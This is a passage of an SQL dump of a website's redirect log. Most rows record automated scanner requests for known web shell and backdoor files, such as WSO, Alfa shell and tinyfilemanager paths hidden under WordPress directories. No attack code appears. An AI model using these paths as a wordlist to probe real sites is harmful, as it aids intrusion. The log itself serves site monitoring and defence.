00:00:00',301),(58577,'http://3s-technologies.com.tr/tr/wpver.php',NULL,'','',3,0,'2026-02-27 17:48:23','0000-00-00 00:00:00',301),(58578,'http://3s-technologies.com.tr/tr/public/hi.php',NULL,'','',7,0,'2026-02-27 17:48:24','0000-00-00 00:00:00',301),(58579,'http://3s-technologies.com.tr/tr/wp-content/sallu.php',NULL,'','',1,0,'2026-02-27 17:48:27','0000-00-00 00:00:00',301),(58580,'http://3s-technologies.com.tr/tr/zc-318.php',NULL,'','',3,0,'2026-02-27 17:48:28','0000-00-00 00:00:00',301),(58581,'http://3s-technologies.com.tr/tr/wp-admin/sallu.php',NULL,'','',1,0,'2026-02-27 17:48:28','0000-00-00 00:00:00',301),(58582,'http://3s-technologies.com.tr/tr/ebahvhhh.php',NULL,'','',3,0,'2026-02-27 17:48:33','0000-00-00 00:00:00',301),(58583,'http://3s-technologies.com.tr/tr/snq.php',NULL,'','',3,0,'2026-02-27 17:48:33','0000-00-00 00:00:00',301),(58584,'http://3s-technologies.com.tr/tr/public/wp-blog.php',NULL,'','',22,0,'2026-02-27 17:48:37','0000-00-00 00:00:00',301),(58585,'http://3s-technologies.com.tr/tr/bsg-management/php.php',NULL,'','',3,0,'2026-02-27 17:48:40','0000-00-00 00:00:00',301),(58586,'http://3s-technologies.com.tr/tr/ws61.php',NULL,'','',19,0,'2026-02-27 17:48:42','0000-00-00 00:00:00',301),(58587,'http://3s-technologies.com.tr/tr/mamzi.php',NULL,'','',13,0,'2026-02-27 17:48:45','0000-00-00 00:00:00',301),(58588,'http://3s-technologies.com.tr/tr/dsd.php',NULL,'','',3,0,'2026-02-27 17:48:50','0000-00-00 00:00:00',301),(58589,'http://3s-technologies.com.tr/tr/guk.php',NULL,'','',3,0,'2026-02-27 17:48:51','0000-00-00 00:00:00',301),(58590,'http://3s-technologies.com.tr/tr/tax.php',NULL,'','',3,0,'2026-02-27 17:48:54','0000-00-00 00:00:00',301),(58591,'http://3s-technologies.com.tr/tr/brc.php',NULL,'','',3,0,'2026-02-27 17:48:56','0000-00-00 00:00:00',301),(58592,'http://3s-technologies.com.tr/tr/fr/ms.php',NULL,'','',3,0,'2026-02-27 17:48:58','0000-00-00 00:00:00',301),(58593,'http://3s-technologies.com.tr/tr/ws62.php',NULL,'','',7,0,'2026-02-27 17:49:06','0000-00-00 00:00:00',301),(58594,'http://3s-technologies.com.tr/tr/gjm.php',NULL,'','',3,0,'2026-02-27 17:49:09','0000-00-00 00:00:00',301),(58595,'http://3s-technologies.com.tr/tr/sadd.php',NULL,'','',7,0,'2026-02-27 17:49:14','0000-00-00 00:00:00',301),(58596,'http://3s-technologies.com.tr/tr/nzv.php',NULL,'','',3,0,'2026-02-27 17:49:19','0000-00-00 00:00:00',301),(58597,'http://3s-technologies.com.tr/tr/nhr.php',NULL,'','',3,0,'2026-02-27 17:49:21','0000-00-00 00:00:00',301),(58598,'http://3s-technologies.com.tr/tr/ws79.php',NULL,'','',10,0,'2026-02-27 17:49:23','0000-00-00 00:00:00',301),(58599,'http://3s-technologies.com.tr/tr/1061.php',NULL,'','',3,0,'2026-02-27 17:49:24','0000-00-00 00:00:00',301),(58600,'http://3s-technologies.com.tr/tr/xmy.php',NULL,'','',3,0,'2026-02-27 17:49:31','0000-00-00 00:00:00',301),(58601,'http://3s-technologies.com.tr/tr/wp-admin/sc.php',NULL,'','',3,0,'2026-02-27 17:49:37','0000-00-00 00:00:00',301),(58602,'http://3s-technologies.com.tr/tr/rpk.php',NULL,'','',3,0,'2026-02-27 17:49:39','0000-00-00 00:00:00',301),(58603,'http://3s-technologies.com.tr/tr/sxdfrt.php',NULL,'','',6,0,'2026-02-27 17:49:54','0000-00-00 00:00:00',301),(58604,'http://3s-technologies.com.tr/tr/sdsa.php',NULL,'','',3,0,'2026-02-27 17:50:00','0000-00-00 00:00:00',301),(58605,'http://3s-technologies.com.tr/tr/plugins/editors/jckeditor/plugins/jtreelink/jtreelink.xml',NULL,'','',3,0,'2026-02-27 19:35:51','0000-00-00 00:00:00',301),(58606,'http://3s-technologies.com.tr/tr/wp-content/uploads/mfw-activity-logger/csv-uploads/titaniumex.php',NULL,'','',4,0,'2026-02-27 21:58:19','0000-00-00 00:00:00',301),(58607,'http://3s-technologies.com.tr/tr/wp-admin/maint/css.php',NULL,'','',1,0,'2026-02-27 21:58:19','0000-00-00 00:00:00',301),(58608,'http://3s-technologies.com.tr/tr/wp-content/plugins/stats/instoll.php',NULL,'','',1,0,'2026-02-27 21:58:21','0000-00-00 00:00:00',301),(58609,'http://3s-technologies.com.tr/tr/wp-admin/network/checkbex.php',NULL,'','',1,0,'2026-02-27 21:58:22','0000-00-00 00:00:00',301),(58610,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/termps.php',NULL,'','',1,0,'2026-02-27 21:58:23','0000-00-00 00:00:00',301),(58611,'http://3s-technologies.com.tr/tr/phpmailer/index.php',NULL,'','',1,0,'2026-02-27 21:58:25','0000-00-00 00:00:00',301),(58612,'http://3s-technologies.com.tr/tr/assets/images/caf7c5b3a2.php',NULL,'','',1,0,'2026-02-27 21:58:26','0000-00-00 00:00:00',301),(58613,'http://3s-technologies.com.tr/tr/wp-includes/capabilities1.php',NULL,'','',1,0,'2026-02-27 21:58:26','0000-00-00 00:00:00',301),(58614,'http://3s-technologies.com.tr/tr/vcard.php',NULL,'','',2,0,'2026-02-27 21:58:27','0000-00-00 00:00:00',301),(58615,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/preferences/admin-ajax.php',NULL,'','',1,0,'2026-02-27 21:58:29','0000-00-00 00:00:00',301),(58616,'http://3s-technologies.com.tr/tr/uploads/cache.cleaner.php',NULL,'','',1,0,'2026-02-27 21:58:30','0000-00-00 00:00:00',301),(58617,'http://3s-technologies.com.tr/tr/wp-includes/images/ourlb.php',NULL,'','',1,0,'2026-02-27 21:58:31','0000-00-00 00:00:00',301),(58618,'http://3s-technologies.com.tr/tr/.tmb2434353s/index.php',NULL,'','',1,0,'2026-02-27 21:58:31','0000-00-00 00:00:00',301),(58619,'http://3s-technologies.com.tr/tr/wp-content/themes/bolster-theme/include/lang_upload.php',NULL,'','',1,0,'2026-02-27 21:58:32','0000-00-00 00:00:00',301),(58620,'http://3s-technologies.com.tr/tr/sundax.php',NULL,'','',1,0,'2026-02-27 21:58:33','0000-00-00 00:00:00',301),(58621,'http://3s-technologies.com.tr/tr/wp-admin/images/pages.php',NULL,'','',1,0,'2026-02-27 21:58:34','0000-00-00 00:00:00',301),(58622,'http://3s-technologies.com.tr/tr/assets/contao/item.php',NULL,'','',1,0,'2026-02-27 21:58:34','0000-00-00 00:00:00',301),(58623,'http://3s-technologies.com.tr/tr/qpglkpgm.php',NULL,'','',1,0,'2026-02-27 21:58:36','0000-00-00 00:00:00',301),(58624,'http://3s-technologies.com.tr/tr/maint/jp.php',NULL,'','',1,0,'2026-02-27 21:58:37','0000-00-00 00:00:00',301),(58625,'http://3s-technologies.com.tr/tr/css/colors/blue/rafosul.php',NULL,'','',1,0,'2026-02-27 21:58:38','0000-00-00 00:00:00',301),(58626,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/commands/webix.php',NULL,'','',1,0,'2026-02-27 21:58:39','0000-00-00 00:00:00',301),(58627,'http://3s-technologies.com.tr/tr/adminer.php/shell.php/text.php',NULL,'','',1,0,'2026-02-27 21:58:40','0000-00-00 00:00:00',301),(58628,'http://3s-technologies.com.tr/tr/wp-content/plugins/gmxwbau/hzwttmff.php',NULL,'','',1,0,'2026-02-27 21:58:41','0000-00-00 00:00:00',301),(58629,'http://3s-technologies.com.tr/tr/wso-enigma.php',NULL,'','',1,0,'2026-02-27 21:58:42','0000-00-00 00:00:00',301),(58630,'http://3s-technologies.com.tr/tr/wp-includes/gif.php',NULL,'','',1,0,'2026-02-27 21:58:43','0000-00-00 00:00:00',301),(58631,'http://3s-technologies.com.tr/tr/wp-includes/blocks/block/moon.php',NULL,'','',1,0,'2026-02-27 21:58:44','0000-00-00 00:00:00',301),(58632,'http://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/themes.php',NULL,'','',1,0,'2026-02-27 21:58:45','0000-00-00 00:00:00',301),(58633,'http://3s-technologies.com.tr/tr/wp-content/plugins/ern/classwithtostring.php',NULL,'','',1,0,'2026-02-27 21:58:46','0000-00-00 00:00:00',301),(58634,'http://3s-technologies.com.tr/tr/fnyeltio.php',NULL,'','',1,0,'2026-02-27 21:58:46','0000-00-00 00:00:00',301),(58635,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/class.engine.php',NULL,'','',1,0,'2026-02-27 21:58:47','0000-00-00 00:00:00',301),(58636,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/format-library/admin.php',NULL,'','',1,0,'2026-02-27 21:58:48','0000-00-00 00:00:00',301),(58637,'http://3s-technologies.com.tr/tr/affiliate_manager.php',NULL,'','',1,0,'2026-02-27 21:58:49','0000-00-00 00:00:00',301),(58638,'http://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/bk.php',NULL,'','',1,0,'2026-02-27 21:58:49','0000-00-00 00:00:00',301),(58639,'http://3s-technologies.com.tr/tr/duck.php/cpvcigyk.php/text.php',NULL,'','',1,0,'2026-02-27 21:58:50','0000-00-00 00:00:00',301),(58640,'http://3s-technologies.com.tr/tr/contact.php/file1.php/text.php',NULL,'','',1,0,'2026-02-27 21:58:51','0000-00-00 00:00:00',301),(58641,'http://3s-technologies.com.tr/tr/wp-includes/blocks/more/alfa-rex.php8',NULL,'','',1,0,'2026-02-27 21:58:51','0000-00-00 00:00:00',301),(58642,'http://3s-technologies.com.tr/tr/assets/contao/js/foter.php',NULL,'','',1,0,'2026-02-27 21:58:53','0000-00-00 00:00:00',301),(58643,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/editor/tinyfilemanager.php',NULL,'','',1,0,'2026-02-27 21:58:54','0000-00-00 00:00:00',301),(58644,'http://3s-technologies.com.tr/tr/wp-includes/assets/404.php',NULL,'','',1,0,'2026-02-27 21:58:55','0000-00-00 00:00:00',301),(58645,'http://3s-technologies.com.tr/tr/blog/wp-2018.php',NULL,'','',1,0,'2026-02-27 21:58:56','0000-00-00 00:00:00',301),(58646,'http://3s-technologies.com.tr/tr/wp-content/plugins/aioseoextensions/file.php',NULL,'','',1,0,'2026-02-27 21:58:56','0000-00-00 00:00:00',301),(58647,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpress3cll/up.php',NULL,'','',1,0,'2026-02-27 21:58:57','0000-00-00 00:00:00',301),(58648,'http://3s-technologies.com.tr/tr/blocks/tinyfilemanager.php',NULL,'','',1,0,'2026-02-27 21:59:00','0000-00-00 00:00:00',301),(58649,'http://3s-technologies.com.tr/tr/wp-includes/class-simplepie.php',NULL,'','',1,0,'2026-02-27 21:59:02','0000-00-00 00:00:00',301),(58650,'http://3s-technologies.com.tr/tr/wp-content/plugins/myflash',NULL,'','',1,0,'2026-02-27 21:59:04','0000-00-00 00:00:00',301),(58651,'http://3s-technologies.com.tr/tr/.well-known/rd.php',NULL,'','',1,0,'2026-02-27 21:59:04','0000-00-00 00:00:00',301),(58652,'http://3s-technologies.com.tr/tr/oload_classmap.php',NULL,'','',2,0,'2026-02-27 21:59:05','0000-00-00 00:00:00',301),(58653,'http://3s-technologies.com.tr/tr/wp-admin/images/spin.php',NULL,'','',2,0,'2026-02-27 21:59:06','0000-00-00 00:00:00',301),(58654,'http://3s-technologies.com.tr/tr/wp-includes/customize/parx.php',NULL,'','',2,0,'2026-02-27 21:59:07','0000-00-00 00:00:00',301),(58655,'http://3s-technologies.com.tr/tr/ixr/network.php',NULL,'','',2,0,'2026-02-27 21:59:08','0000-00-00 00:00:00',301),(58656,'http://3s-technologies.com.tr/tr/wp-content/plugins/fix/byp.php',NULL,'','',2,0,'2026-02-27 21:59:09','0000-00-00 00:00:00',301),(58657,'http://3s-technologies.com.tr/tr/transaction_history.php',NULL,'','',2,0,'2026-02-27 21:59:09','0000-00-00 00:00:00',301),(58658,'http://3s-technologies.com.tr/tr/assets/contao/css/service.php',NULL,'','',2,0,'2026-02-27 21:59:10','0000-00-00 00:00:00',301),(58659,'http://3s-technologies.com.tr/tr/dqbayyrz.php/text.php/shell.php',NULL,'','',2,0,'2026-02-27 21:59:11','0000-00-00 00:00:00',301),(58660,'http://3s-technologies.com.tr/tr/wp-includes/text/input.php',NULL,'','',2,0,'2026-02-27 21:59:12','0000-00-00 00:00:00',301),(58661,'http://3s-technologies.com.tr/tr/uploads/uploads__.php',NULL,'','',2,0,'2026-02-27 21:59:13','0000-00-00 00:00:00',301),(58662,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light/vsqcqef.php',NULL,'','',2,0,'2026-02-27 21:59:14','0000-00-00 00:00:00',301),(58663,'http://3s-technologies.com.tr/tr/js/jcrop/jcrop.php',NULL,'','',2,0,'2026-02-27 21:59:14','0000-00-00 00:00:00',301),(58664,'http://3s-technologies.com.tr/tr/wp-admin/images/service.php',NULL,'','',2,0,'2026-02-27 21:59:15','0000-00-00 00:00:00',301),(58665,'http://3s-technologies.com.tr/tr/js/cache.php',NULL,'','',3,0,'2026-02-27 21:59:16','0000-00-00 00:00:00',301),(58666,'http://3s-technologies.com.tr/tr/mrbmppbo.php',NULL,'','',2,0,'2026-02-27 21:59:19','0000-00-00 00:00:00',301),(58667,'http://3s-technologies.com.tr/tr/db/phpmyadmin3/index.php',NULL,'','',1,0,'2026-02-27 21:59:21','0000-00-00 00:00:00',301),(58668,'http://3s-technologies.com.tr/tr/tews.php',NULL,'','',4,0,'2026-02-27 22:01:33','0000-00-00 00:00:00',301),(58669,'http://3s-technologies.com.tr/tr/wpp.php',NULL,'','',2,0,'2026-02-27 22:01:33','0000-00-00 00:00:00',301),(58670,'http://3s-technologies.com.tr/tr/samfa.php',NULL,'','',2,0,'2026-02-27 22:01:48','0000-00-00 00:00:00',301),(58671,'http://3s-technologies.com.tr/tr/boots.php',NULL,'','',2,0,'2026-02-27 22:01:48','0000-00-00 00:00:00',301),(58672,'http://3s-technologies.com.tr/tr/logi.php',NULL,'','',2,0,'2026-02-27 22:01:49','0000-00-00 00:00:00',301),(58673,'https://3s-technologies.com.tr/en/registration',NULL,'https://3s-technologies.com.tr/','',1,0,'2026-02-27 22:13:28','0000-00-00 00:00:00',301),(58674,'https://3s-technologies.com.tr/en/register',NULL,'https://3s-technologies.com.tr/','',2,0,'2026-02-27 22:13:28','0000-00-00 00:00:00',301),(58675,'https://3s-technologies.com.tr/en/signup',NULL,'https://3s-technologies.com.tr/','',1,0,'2026-02-27 22:13:29','0000-00-00 00:00:00',301),(58676,'https://3s-technologies.com.tr/en/user/register',NULL,'https://3s-technologies.com.tr/','',1,0,'2026-02-27 22:13:30','0000-00-00 00:00:00',301),(58677,'https://3s-technologies.com.tr/en/create-account',NULL,'https://3s-technologies.com.tr/','',1,0,'2026-02-27 22:13:30','0000-00-00 00:00:00',301),(58678,'https://3s-technologies.com.tr/en/регистрация',NULL,'https://3s-technologies.com.tr/','',1,0,'2026-02-27 22:13:31','0000-00-00 00:00:00',301),(58679,'https://3s-technologies.com.tr/en/ru/register',NULL,'https://3s-technologies.com.tr/','',1,0,'2026-02-27 22:13:32','0000-00-00 00:00:00',301),(58680,'http://mail.3s-technologies.com.tr/tr/ws77.php',NULL,'','',16,0,'2026-02-27 22:28:12','0000-00-00 00:00:00',301),(58681,'http://mail.3s-technologies.com.tr/tr/wp9.php',NULL,'','',55,0,'2026-02-27 22:28:13','0000-00-00 00:00:00',301),(58682,'http://mail.3s-technologies.com.tr/tr/cxxuv.php',NULL,'','',1,0,'2026-02-27 22:28:21','0000-00-00 00:00:00',301),(58683,'http://mail.3s-technologies.com.tr/tr/e0v9e95c.php',NULL,'','',1,0,'2026-02-27 22:28:24','0000-00-00 00:00:00',301),(58684,'http://mail.3s-technologies.com.tr/tr/ws75.php',NULL,'','',9,0,'2026-02-27 22:28:26','0000-00-00 00:00:00',301),(58685,'http://mail.3s-technologies.com.tr/tr/ws49.php',NULL,'','',15,0,'2026-02-27 22:28:27','0000-00-00 00:00:00',301),(58686,'http://mail.3s-technologies.com.tr/tr/y5mxlivo9nk.php',NULL,'','',1,0,'2026-02-27 22:28:28','0000-00-00 00:00:00',301),(58687,'http://mail.3s-technologies.com.tr/tr/wp-f.php',NULL,'','',1,0,'2026-02-27 22:28:29','0000-00-00 00:00:00',301),(58688,'http://mail.3s-technologies.com.tr/tr/tx78.php',NULL,'','',15,0,'2026-02-27 22:28:30','0000-00-00 00:00:00',301),(58689,'http://mail.3s-technologies.com.tr/tr/wp_bqlc0mqe.php',NULL,'','',1,0,'2026-02-27 22:28:31','0000-00-00 00:00:00',301),(58690,'http://mail.3s-technologies.com.tr/tr/0bb45ctt.php',NULL,'','',1,0,'2026-02-27 22:28:32','0000-00-00 00:00:00',301),(58691,'http://mail.3s-technologies.com.tr/tr/ws80.php',NULL,'','',30,0,'2026-02-27 22:28:32','0000-00-00 00:00:00',301),(58692,'http://mail.3s-technologies.com.tr/tr/tx79.php',NULL,'','',30,0,'2026-02-27 22:28:33','0000-00-00 00:00:00',301),(58693,'http://mail.3s-technologies.com.tr/tr/wdf.php',NULL,'','',19,0,'2026-02-27 22:28:37','0000-00-00 00:00:00',301),(58694,'http://mail.3s-technologies.com.tr/tr/f6ijmjpa.php',NULL,'','',1,0,'2026-02-27 22:28:38','0000-00-00 00:00:00',301),(58695,'http://mail.3s-technologies.com.tr/tr/wp_jvml8v37.php',NULL,'','',1,0,'2026-02-27 22:28:39','0000-00-00 00:00:00',301),(58696,'http://mail.3s-technologies.com.tr/tr/ws81.php',NULL,'','',21,0,'2026-02-27 22:28:40','0000-00-00 00:00:00',301),(58697,'http://mail.3s-technologies.com.tr/tr/e31hmf9b.php',NULL,'','',1,0,'2026-02-27 22:28:41','0000-00-00 00:00:00',301),(58698,'http://mail.3s-technologies.com.tr/tr/tews.php',NULL,'','',3,0,'2026-02-28 08:43:44','0000-00-00 00:00:00',301),(58699,'http://mail.3s-technologies.com.tr/tr/wpp.php',NULL,'','',2,0,'2026-02-28 08:43:45','0000-00-00 00:00:00',301),(58700,'http://mail.3s-technologies.com.tr/tr/samfa.php',NULL,'','',1,0,'2026-02-28 08:44:36','0000-00-00 00:00:00',301),(58701,'http://3s-technologies.com.tr/tr/wp-admin/js/mediiaa-widget-video.php',NULL,'','',1,0,'2026-02-28 11:09:41','0000-00-00 00:00:00',301),(58702,'http://3s-technologies.com.tr/tr/.well-known/nastar.php',NULL,'','',12,0,'2026-02-28 11:09:42','0000-00-00 00:00:00',301),(58703,'http://3s-technologies.com.tr/tr/wp-admin/maint/bk.php',NULL,'','',1,0,'2026-02-28 11:09:43','0000-00-00 00:00:00',301),(58704,'http://3s-technologies.com.tr/tr/wp-admin/maint/x6.php',NULL,'','',1,0,'2026-02-28 11:09:43','0000-00-00 00:00:00',301),(58705,'http://3s-technologies.com.tr/tr/wp-admin/css/widgets.sys.php',NULL,'','',1,0,'2026-02-28 11:09:45','0000-00-00 00:00:00',301),(58706,'http://3s-technologies.com.tr/tr/wp-admin/includes/hp2.php',NULL,'','',1,0,'2026-02-28 11:09:46','0000-00-00 00:00:00',301),(58707,'http://3s-technologies.com.tr/tr/wp-includes/jga.php',NULL,'','',1,0,'2026-02-28 11:09:46','0000-00-00 00:00:00',301),(58708,'http://3s-technologies.com.tr/tr/wp-admin/maint/vc.php',NULL,'','',1,0,'2026-02-28 11:09:47','0000-00-00 00:00:00',301),(58709,'http://3s-technologies.com.tr/tr/wp-includes/widgets/widget-cache.php',NULL,'','',1,0,'2026-02-28 11:09:48','0000-00-00 00:00:00',301),(58710,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-json-ajax.php',NULL,'','',1,0,'2026-02-28 11:09:48','0000-00-00 00:00:00',301),(58711,'http://3s-technologies.com.tr/tr/files/add_gasto.php',NULL,'','',1,0,'2026-02-28 11:09:49','0000-00-00 00:00:00',301),(58712,'http://3s-technologies.com.tr/tr/uploads/select_file.php',NULL,'','',1,0,'2026-02-28 11:09:50','0000-00-00 00:00:00',301),(58713,'http://3s-technologies.com.tr/tr/uploads/select_file2.php',NULL,'','',1,0,'2026-02-28 11:09:50','0000-00-00 00:00:00',301),(58714,'http://3s-technologies.com.tr/tr/wp-admin/includes/detmash.php',NULL,'','',1,0,'2026-02-28 11:09:51','0000-00-00 00:00:00',301),(58715,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/incl.php',NULL,'','',1,0,'2026-02-28 11:09:54','0000-00-00 00:00:00',301),(58716,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers.php',NULL,'','',1,0,'2026-02-28 11:09:56','0000-00-00 00:00:00',301),(58717,'http://3s-technologies.com.tr/tr/images/image.php',NULL,'','',2,0,'2026-02-28 11:09:57','0000-00-00 00:00:00',301),(58718,'http://3s-technologies.com.tr/tr/images/image2.php',NULL,'','',2,0,'2026-02-28 11:09:58','0000-00-00 00:00:00',301),(58719,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/ws.php',NULL,'','',1,0,'2026-02-28 11:09:59','0000-00-00 00:00:00',301),(58720,'http://3s-technologies.com.tr/tr/uploads/mandals.php',NULL,'','',1,0,'2026-02-28 11:09:59','0000-00-00 00:00:00',301),(58721,'http://3s-technologies.com.tr/tr/wp-admin/maint/ws27.php',NULL,'','',1,0,'2026-02-28 11:10:00','0000-00-00 00:00:00',301),(58722,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-duotone.php',NULL,'','',1,0,'2026-02-28 11:10:01','0000-00-00 00:00:00',301),(58723,'http://3s-technologies.com.tr/tr/files/d.be.brow.php',NULL,'','',1,0,'2026-02-28 11:10:02','0000-00-00 00:00:00',301),(58724,'http://3s-technologies.com.tr/tr/files/add_evento.php',NULL,'','',1,0,'2026-02-28 11:10:03','0000-00-00 00:00:00',301),(58725,'http://3s-technologies.com.tr/tr/wp-admin/maint/goods.php',NULL,'','',1,0,'2026-02-28 11:10:04','0000-00-00 00:00:00',301),(58726,'http://3s-technologies.com.tr/tr/wp-admin/js/goods.php',NULL,'','',1,0,'2026-02-28 11:10:05','0000-00-00 00:00:00',301),(58727,'http://3s-technologies.com.tr/tr/wp-admin/js/searchforma.php',NULL,'','',1,0,'2026-02-28 11:10:05','0000-00-00 00:00:00',301),(58728,'http://3s-technologies.com.tr/tr/wp-admin/maint/222.php',NULL,'','',1,0,'2026-02-28 11:10:06','0000-00-00 00:00:00',301),(58729,'http://3s-technologies.com.tr/tr/wp-admin/js/ms-site.php',NULL,'','',2,0,'2026-02-28 11:10:07','0000-00-00 00:00:00',301),(58730,'http://3s-technologies.com.tr/tr/wp-includes/wp-settings2.php',NULL,'','',1,0,'2026-02-28 11:10:12','0000-00-00 00:00:00',301),(58731,'http://3s-technologies.com.tr/tr/wp-content/upgrade/alfa-rex.php',NULL,'','',2,0,'2026-02-28 11:10:14','0000-00-00 00:00:00',301),(58732,'http://3s-technologies.com.tr/tr/wp-content/uploads/2026/02/index.php',NULL,'','',1,0,'2026-02-28 11:10:16','0000-00-00 00:00:00',301),(58733,'http://3s-technologies.com.tr/tr/wp-content/uploads/2026/01/mybackpack.php',NULL,'','',1,0,'2026-02-28 11:10:17','0000-00-00 00:00:00',301),(58734,'http://3s-technologies.com.tr/tr/wp-admin/css/error.php',NULL,'','',1,0,'2026-02-28 11:10:20','0000-00-00 00:00:00',301),(58735,'http://3s-technologies.com.tr/tr/yereongu.php',NULL,'','',1,0,'2026-02-28 11:10:22','0000-00-00 00:00:00',301),(58736,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/leuk.php',NULL,'','',1,0,'2026-02-28 11:10:22','0000-00-00 00:00:00',301),(58737,'http://3s-technologies.com.tr/tr/wp-admin/maint/sql.php',NULL,'','',1,0,'2026-02-28 11:10:25','0000-00-00 00:00:00',301),(58738,'http://3s-technologies.com.tr/tr/uploads/wp.php',NULL,'','',1,0,'2026-02-28 11:10:25','0000-00-00 00:00:00',301),(58739,'http://3s-technologies.com.tr/tr/wp-admin/includes/cores.php',NULL,'','',1,0,'2026-02-28 11:10:26','0000-00-00 00:00:00',301),(58740,'http://3s-technologies.com.tr/tr/wp-includes/widgets/ws62.php',NULL,'','',1,0,'2026-02-28 11:10:27','0000-00-00 00:00:00',301),(58741,'http://3s-technologies.com.tr/tr/wp-content/upgrade/worksec.php',NULL,'','',1,0,'2026-02-28 11:10:28','0000-00-00 00:00:00',301),(58742,'http://3s-technologies.com.tr/tr/wp-includes/pomo/feeds.php',NULL,'','',1,0,'2026-02-28 11:10:29','0000-00-00 00:00:00',301),(58743,'http://3s-technologies.com.tr/tr/wp-admin/maint/wp-good.php',NULL,'','',1,0,'2026-02-28 11:10:30','0000-00-00 00:00:00',301),(58744,'http://3s-technologies.com.tr/tr/wp-includes/images/signup_pad_classic.php',NULL,'','',1,0,'2026-02-28 11:10:30','0000-00-00 00:00:00',301),(58745,'http://3s-technologies.com.tr/tr/wp-admin/includes/v2.php',NULL,'','',1,0,'2026-02-28 11:10:31','0000-00-00 00:00:00',301),(58746,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-ge.php',NULL,'','',2,0,'2026-02-28 11:10:32','0000-00-00 00:00:00',301),(58747,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-https.php',NULL,'','',1,0,'2026-02-28 11:10:32','0000-00-00 00:00:00',301),(58748,'http://3s-technologies.com.tr/tr/wp-includes/fonts/rawwp.php',NULL,'','',1,0,'2026-02-28 11:10:33','0000-00-00 00:00:00',301),(58749,'http://3s-technologies.com.tr/tr/wp-includes/class-mail.php',NULL,'','',1,0,'2026-02-28 11:10:34','0000-00-00 00:00:00',301),(58750,'http://3s-technologies.com.tr/tr/.well-known/uhuybro.php',NULL,'','',1,0,'2026-02-28 11:10:35','0000-00-00 00:00:00',301),(58751,'http://3s-technologies.com.tr/tr/wp-admin/css/footers.php',NULL,'','',1,0,'2026-02-28 11:10:36','0000-00-00 00:00:00',301),(58752,'http://3s-technologies.com.tr/tr/.well-known/icedknnv.php',NULL,'','',1,0,'2026-02-28 11:10:37','0000-00-00 00:00:00',301),(58753,'http://3s-technologies.com.tr/tr/images/post_genprdt.php',NULL,'','',1,0,'2026-02-28 11:10:38','0000-00-00 00:00:00',301),(58754,'http://3s-technologies.com.tr/tr/wp-admin/includes/user-ajax.php',NULL,'','',1,0,'2026-02-28 11:10:41','0000-00-00 00:00:00',301),(58755,'http://3s-technologies.com.tr/tr/wp-admin/images/chati.php',NULL,'','',1,0,'2026-02-28 11:10:42','0000-00-00 00:00:00',301),(58756,'http://mail.3s-technologies.com.tr/tr/yo.php',NULL,'','',1,0,'2026-02-28 12:50:25','0000-00-00 00:00:00',301),(58757,'http://mail.3s-technologies.com.tr/tr/ba.php',NULL,'','',2,0,'2026-02-28 12:50:27','0000-00-00 00:00:00',301),(58758,'http://mail.3s-technologies.com.tr/tr/ym.php',NULL,'','',1,0,'2026-02-28 12:50:27','0000-00-00 00:00:00',301),(58759,'http://mail.3s-technologies.com.tr/tr/wp-mails.php',NULL,'','',2,0,'2026-02-28 12:50:34','0000-00-00 00:00:00',301),(58760,'http://mail.3s-technologies.com.tr/tr/key.php',NULL,'','',1,0,'2026-02-28 12:50:36','0000-00-00 00:00:00',301),(58761,'http://mail.3s-technologies.com.tr/tr/ctfbe.php',NULL,'','',1,0,'2026-02-28 12:50:37','0000-00-00 00:00:00',301),(58762,'http://mail.3s-technologies.com.tr/tr/hkweu.php',NULL,'','',1,0,'2026-02-28 12:50:38','0000-00-00 00:00:00',301),(58763,'http://mail.3s-technologies.com.tr/tr/qdlte.php',NULL,'','',1,0,'2026-02-28 12:50:38','0000-00-00 00:00:00',301),(58764,'http://mail.3s-technologies.com.tr/tr/f7.php',NULL,'','',1,0,'2026-02-28 12:50:39','0000-00-00 00:00:00',301),(58765,'http://mail.3s-technologies.com.tr/tr/clcdu.php',NULL,'','',2,0,'2026-02-28 12:50:42','0000-00-00 00:00:00',301),(58766,'http://mail.3s-technologies.com.tr/tr/ffbsq.php',NULL,'','',1,0,'2026-02-28 12:50:43','0000-00-00 00:00:00',301),(58767,'http://mail.3s-technologies.com.tr/tr/kma.php',NULL,'','',1,0,'2026-02-28 12:50:46','0000-00-00 00:00:00',301),(58768,'http://mail.3s-technologies.com.tr/tr/ova-wso.php',NULL,'','',3,0,'2026-02-28 12:50:47','0000-00-00 00:00:00',301),(58769,'http://mail.3s-technologies.com.tr/tr/ol.php7',NULL,'','',1,0,'2026-02-28 12:50:48','0000-00-00 00:00:00',301),(58770,'http://mail.3s-technologies.com.tr/tr/sql.php7',NULL,'','',1,0,'2026-02-28 12:50:50','0000-00-00 00:00:00',301),(58771,'http://mail.3s-technologies.com.tr/tr/zc.php',NULL,'','',1,0,'2026-02-28 12:50:52','0000-00-00 00:00:00',301),(58772,'http://3s-technologies.com.tr/tr/e0v9e95c.php',NULL,'','',2,0,'2026-02-28 12:56:22','0000-00-00 00:00:00',301),(58773,'http://3s-technologies.com.tr/tr/ws75.php',NULL,'','',18,0,'2026-02-28 12:56:24','0000-00-00 00:00:00',301),(58774,'http://3s-technologies.com.tr/tr/ws49.php',NULL,'','',24,0,'2026-02-28 12:56:25','0000-00-00 00:00:00',301),(58775,'http://3s-technologies.com.tr/tr/y5mxlivo9nk.php',NULL,'','',2,0,'2026-02-28 12:56:26','0000-00-00 00:00:00',301),(58776,'http://3s-technologies.com.tr/tr/tx78.php',NULL,'','',20,0,'2026-02-28 12:56:28','0000-00-00 00:00:00',301),(58777,'http://3s-technologies.com.tr/tr/wp_bqlc0mqe.php',NULL,'','',2,0,'2026-02-28 12:56:29','0000-00-00 